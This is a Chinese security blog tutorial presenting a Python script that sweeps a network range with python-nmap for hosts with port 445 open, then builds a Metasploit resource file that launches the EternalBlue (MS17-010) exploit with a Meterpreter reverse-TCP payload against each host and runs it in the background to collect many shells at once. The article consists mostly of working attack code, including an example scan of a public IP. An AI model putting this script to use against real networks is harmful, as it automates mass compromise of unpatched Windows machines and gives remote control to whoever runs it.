社区首页 >专栏 >Python脚本与Metasploit交互批量产出MS17_010 shell

Python脚本与Metasploit交互批量产出MS17_010 shell

安恒网络空间安全讲武堂

发布于 2019-09-29 06:25:45

2.3K00

代码可运行

文章被收录于专栏：安恒网络空间安全讲武堂安恒网络空间安全讲武堂

运行总次数：0

代码可运行

前言:

2017年5月，被称为近10年来影响范围最广泛“最嚣张”的WannaCry勒索病毒席卷全球，据统计，全球共有150多个国家超30万台终端被感染，波及政府、学校、医院、金融、航班等各行各业。在神器Metasploit中我们利用exploit/windows/smb/ms17010eternalblue这个模块可以对这个漏洞进行复现,但是在对内网整个网段进行漏洞验证的时候每次都要输入参数的过程让我觉得很繁琐,于是写下了ms17_010漏洞批量利用的脚本

实验环境安装:

以kali为例(安装nmap库): pip install nmap pip install python-nmap (如果是ubuntu 请自行安装nmap和msf控制台)

整体代码架构

利用nmap库扫描:

首先,需要了解一下python一个名为nmap的第三方库,给网络扫描带来了极大的便利,创建一个PortScanner()类对象,这使我们能用这个对象完成扫描操作,利用类里面的scan()函数,将目标主机的地址和端口作为参数输入,进行扫描,通过返回的参数来判断主机的状态, 以扫描百度的80端口为例:

import nmap
scanner=nmap.PortScanner()  //创建一个PortScanner()类对象
result=scanner.scan('183.232.231.172','80') //利用scan()函数对主机的地址和端口进行扫描
print result  //输出返回信息

返回信息:

{'nmap': {'scanstats': {'uphosts': '1', 'timestr': 'Sat Mar 16 01:44:25 2019', 'downhosts': '0', 'totalhosts': '1', 'elapsed': '18.97'}, 'scaninfo': {'tcp': {'services': '80', 'method': 'syn'}}, 'commandline': 'nmap -oX - -p 80 -sV 183.232.231.172'}, 'scan': {'183.232.231.172': {'status': {'state': 'up', 'reason': 'reset'}, 'hostnames': [{'type': '', 'name': ''}], 'vendor': {}, 'addresses': {'ipv4': '183.232.231.172'}, 'tcp': {80: {'product': 'Apache httpd', 'state': 'open', 'version': '', 'name': 'http', 'conf': '10', 'extrainfo': '', 'reason': 'syn-ack', 'cpe': 'cpe:/a:apache:httpserver'}}}}}

uphosts为1则主机存活,0表示主机没有存活,tcp里面的state的值可以看出端口的开放状态, 接下来会重点用到这两个值判断目标主机是否存活和445端口的状态:

def find_target(host):
    target_list=[]  //创建一个列表用来存放主机存活且开放445端口的列表
    for target in IP(str(host))[1:]:  //利用IPy类里面的IP()库转换成每个单独的ip
        target=str(target)
        scanner=nmap.PortScanner()   //初始化一个PortScanner()类对象
        rst=scanner.scan(target,'445')  //对目标的445端口进行扫描
        if rst['nmap']['scanstats']['uphosts'] == '0':  //判断目标主机是否存活
            print 'Host not up:'+target    //用户交互输出
            continue
        state=rst['scan'][target]['tcp'][445]['state']  //记录445端口的开放状态
        if state =='open':  //进行端口状态的判断
            target_list.append(target)   //如果端口开放,将主机ip加入到列表
            print str(target)+' with 445 port open, there may be a vulnerability in ms17_010'
        else:
            print str(target)+' 445 port not open!'
    return target_list

配置文件写入:

def create_file(configfile,target,lhost):
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n') //使用ms17_010利用模块
    configfile.write('set rhost '+target+'\n') //设置rhost
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')  //设置payload
    lport=4444+int(target.split('.')[-1]) //本地监听端口根据ip地址进行计算,防止多个shell产生端口冲突的问题
    configfile.write('set lport '+str(lport)+'\n')  //设置lport
    configfile.write('set lhost '+str(lhost)+'\n')  //设置lhost
    configfile.write('exploit -j -z\n')   //在后台且不与用户交互运行
    print "Your shell will created at "+ str(lhost) + ":"+str(lport)

因为脚本会黑掉多个靶机,不可能同时与他们交互,所以采用exploit -j -z在后台运行,并且本地监听端口为4444+主机地址的计算方式

主函数:

利用optparse库获取用户的输入参数

def main():
    parser = optparse.OptionParser('%prog -H <target> -L <lhost>')   //构造optionparser的对象并且给用户一个说明文档
    parser.add_option('-H',dest='host',type='string')   //在对象中增加参数选项
    parser.add_option('-L',dest='lhost',type='string')   
    (options,args) = parser.parse_args()  //调用optionparser的解析函数,解析用户输入的命令
    host=options.host
    lhost=options.lhost
    if host == None:    //用户如果没有输入扫描目标,输出说明文档
        parser.print_help()
        exit(0)
    target_list=find_target(host)  //获取开放445端口的主机
    for target in target_list:   //对每个主机进行循环
        configfile = open('meta.rc','a')   //利用文件追加的方式打开文件
        create_file(configfile,target,lhost)  //配置文件写入
        configfile.close()
    command='msfconsole -r meta.rc'   //为了缩短测试时间可以将命令先写入一个文件，然后在msf中加载它
    os.system(command)  //运行系统命令